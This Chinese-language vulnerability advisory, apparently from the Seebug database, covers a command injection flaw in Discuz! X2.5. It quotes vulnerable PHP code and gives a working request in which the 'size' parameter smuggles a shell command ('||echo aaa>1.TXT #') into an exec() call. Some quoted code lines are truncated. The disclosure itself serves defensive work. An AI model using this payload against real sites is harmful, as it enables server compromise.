Discuz X2.5 /source/class/class_image.php 命令执行漏洞

基本字段

漏洞编号：: SSV-89024

披露/发现时间：: 2015-01-07

提交时间：: 2015-01-23

漏洞等级：

漏洞类别：: 命令执行

影响组件：: Discuz!
(x2.5)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 5.55KB

<ul><li>/source/module/aforum/forum_image.php</li></ul> ``` $nocache = !empty($_GET['nocache']) ? : ; $daid = intval($_GET['aid']); $type = !empty($_GET['type']) ? $_GET['type'] : 'fixwr'; list($w, $h) = explode('x', $_GET['size']); $dw = intval($w); $dh = intval($h); $thumbfile = 'image/'.$daid.'_'.$dw.'_'.$dh.'.jpg'; $parse = parse_url($_G['setting']['attachurl']); $attachurl = !isset($parse['host']) ? $_G['siteurl'].$_G['setting']['attachurl'] : $_G['setting']['attachurl']; if(!$nocache) { if(file_exists($_G['setting']['attachdir'].$thumbfile)) { dheader('location: '.$attachurl.$thumbfile); } } define('NOROBOT', TRUE); $id = !empty($_GET['atid']) ? $_GET['atid'] : $daid; if(dsign($id.'|'.$dw.'|'.$dh) != $_GET['key']) { dheader('location: '.$_G['siteurl'].'static/image/common/none.gif'); } if($attach = C::t('forum_attachment_n')->fetch('aid:'.$daid, $daid, array(1, -1))) { if(!$dw && !$dh && $attach['tid'] != $id) { dheader('location: '.$_G['siteurl'].'static/image/common/none.gif'); } dheader('Expires: '.gmdate('D, d M Y H:i:s', TIMESTAMP + ).' GMT'); if($attach['remote']) { $filename = $_G['setting']['ftp']['attachurl'].'forum/'.$attach['attachment']; } else { $filename = $_G['setting']['attachdir'].'forum/'.$attach['attachment']; } require_once libfile('class/image'); $img = new image; if($img->Thumb($filename, $thumbfile, $w, $h, $type)) { ``` 带入Thumb方法的变量是$w以及$h，而非过滤后的$dw和$dh。 - /source/class/class_image.php ``` function Thumb($source, $target, $thumbwidth, $thumbheight, $thumbtype = 1, $nosuffix = 0) { $return = $this->init('thumb', $source, $target, $nosuffix); if($return <= 0) { return $this->returncode($return); } if($this->imginfo['animated']) { return $this->returncode(0); } $this->param['thumbwidth'] = $thumbwidth; if(!$thumbheight || $thumbheight > $this->imginfo['height']) { $thumbheight = $thumbwidth > $this->imginfo['width'] ? $this->imginfo['height'] : $this->imginfo['height } $this->param['thumbheight'] = $thumbheight; $this->param['thumbtype'] = $thumbtype; if($thumbwidth < 100 && $thumbheight < 100) { $this->param['thumbquality'] = 100; } $return = !$this->libmethod ? $this->Thumb_GD() : $this->Thumb_IM(); ``` 传入的参数进入$this->param的时候依旧为过滤，进入Thumb_IM方法。 ``` function Thumb_IM() { switch($this->param['thumbtype']) { case 'fixnone': case 1: if($this->imginfo['width'] > $this->param['thumbwidth'] || $this->imginfo['height'] > $this->param[' $exec_str = $this->param['imageimpath'].'/convert -quality '.intval($this->param['thumbquality'] $return = exec($exec_str); if(!file_exists($this->target)) { return -3; } } break; ``` 参数带入exec函数执行，导致任意命令执行。 当用户传入：<pre class="">mod=image&aid=71&size=300x300||echo%20aaa>1.TXT%20%23&key=222dfc26b07dcd6a&nocache=yes&type=fixnone</pre>执行的命令为：<pre class="">/bin/convert -quality 100 -geometry 300x300||echo aaa>1.TXT # /var/www/html/discuzx2.5/upload/./data/attachment/forum/201501/16/143552dnewxwoxwsooezea.jpg /var/www/html/discuzx2.5/upload/./data/attachment/./image/71_300_300.jpg</pre>网站根目录：<img alt="67F3866B-4271-4B5C-A928-171494D73DFA.png" src="https://images.seebug.org/@/uploads/1433907619885-67F3866B-4271-4B5C-A928-171494D73DFA.png" data-image-size="490,125">